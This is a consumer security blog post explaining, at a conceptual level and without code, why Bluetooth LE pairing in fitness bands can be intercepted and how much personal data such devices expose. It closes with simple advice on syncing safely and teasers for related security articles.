As we strive to become more health-conscious, fitness bands have exploded on the world market. Millions of individuals strap on a fitness band each day. We monitor, compare and compete with ourselves and a community of like-minded individuals. Data including the number of steps taken daily, calories burned, heart rate and even our sleep patterns are wirelessly transmitted to our smartphones or computers. But is our data secure?

Low Energy Equals Low Security

There are a few security concerns with fitness bands, and for that matter, any Internet of Things (IoT) device that uses Bluetooth 4.0 VLE, or Very Low Energy.

A key exchange encryption protocol was created specifically for Bluetooth 4.0 VLE. It meets its design goal for using very little energy, but it can be easily compromised. The session encryption protocol uses AES-CCM, a well-known and very secure protocol. Due to the limitations of the key exchange, however, it is relatively simple to become a man-in-the-middle by brute-force attacking the temporary key (TK) because the key exchange is performed in cleartext.

A core i7 processor can guess all possible combinations of the key pair in a single second. Once in communication via the TK, the protocol is followed to negotiate the short-term key (STK) and finally the long-term key (LTK). An attack must begin at the initial pairing. However, it is also simple to jam a session and force a new paring (key exchange) session to start.

The range on Bluetooth 4.0 VLE can be as high as 100 feet, so the sniffing device need not be right by your side. That jogger running 50 feet behind you could be intercepting your data transfer from your fitness band to your phone.

A Treasure Trove of Data

Aside from your name and age, there is an immense amount of personal information attached to your fitness tracker account. GPS data regarding your home address, current location and daily running route could lead to issues of personal safety. If your tracker is linked to your Facebook or Twitter account, even more information regarding your personal life and preferences becomes available to multiple parties.

This information has proven valuable to companies screening new hires and business partners. Information regarding your daily calorie intake and diet as well as your regular exercise level could also be extremely valuable to a health or life insurance company seeking to rewrite policy coverage and decrease profit loss.

Data has become immensely valuable in framing the future of health care and many other industries. Companies with vast banks of data are being purchased for their knowledge potential. Even unstructured data is becoming more valuable since technology can analyze it more rapidly and draw correlatives that were never before possible. In light of this, health care data is currently very valuable on the Dark Web.

Best Practices for Fitness Bands

How do you protect yourself and your private data?

The simplest thing to do is to turn the Bluetooth feature on your phone off until you are home or in a safe environment. Most fitness bands can store a day or more of fitness data. Sync your band and phone once a day, away from potential threats. This keeps your data from being intercepted during unprotected transfers.

One additional benefit: You might experience improved battery life on your phone by only enabling Bluetooth when you actually need it.

More from Endpoint

Self-Checkout This Discord C2

This post was made possible through the contributions of James Kainth, Joseph Lozowski, and Philip Pedersen. In November 2022, during an incident investigation involving a self-checkout point-of-sale (POS) system in Europe, IBM Security X-Force identified a novel technique employed by an attacker to introduce a command and control (C2) channel built upon Discord channel messages. Discord is a chat, voice, and video service enabling users to join and create communities associated with their interests. While Discord and its related software…

3 Reasons to Make EDR Part of Your Incident Response Plan

As threat actors grow in number, the frequency of attacks witnessed globally will continue to rise exponentially. The numerous cases headlining the news today demonstrate that no organization is immune from the risks of a breach. What is an Incident Response Plan? Incident response (IR) refers to an organization’s approach, processes and technologies to detect and respond to cyber breaches. An IR plan specifies how cyberattacks should be identified, contained and remediated. It enables organizations to act quickly and effectively…

Deploying Security Automation to Your Endpoints

Globally, data is growing at an exponential rate. Due to factors like information explosion and the rising interconnectivity of endpoints, data growth will only become a more pressing issue. This enormous influx of data will invariably affect security teams. Faced with an enormous amount of data to sift through, analysts are feeling the crunch. Subsequently, alert fatigue is already a problem for analysts overwhelmed with security tasks. With the continued shortage of qualified staff, organizations are looking for automation to…

Threat Management and Unified Endpoint Management

The worst of the pandemic may be behind us, but we continue to be impacted by it. School-aged kids are trying to catch up academically and socially after two years of disruption. Air travel is a mess. And all businesses have seen a spike in cyberattacks. Cyber threats increased by 81% while COVID-19 was at its peak, with 79% of all organizations experiencing a loss of business operations during that time. The risk of cyberattacks increased so much that the…